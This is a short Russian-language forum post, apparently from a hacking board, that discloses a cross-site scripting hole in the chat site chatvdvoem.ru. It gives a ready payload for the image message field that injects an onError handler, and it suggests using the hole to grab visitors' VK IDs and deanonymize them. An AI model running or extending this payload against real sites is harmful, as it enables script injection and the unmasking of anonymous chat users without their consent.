
18.08.2015, 18:47
|
|
Новичок
Регистрация: 18.08.2015
Сообщений: 1
С нами:
5651606
Репутация:
0
|
|
Type: [XSS]
Product: chatvdvoem.ru
Author: CKahn
Exploit: отправить сообщение:
Код:
Image_msg: x" onError="alert('xss')"
В теории можно вставить скрипт для получения id вк и деанонить пользователей сайта
.SpoilerTarget" type="button">Spoiler: image

|
|
|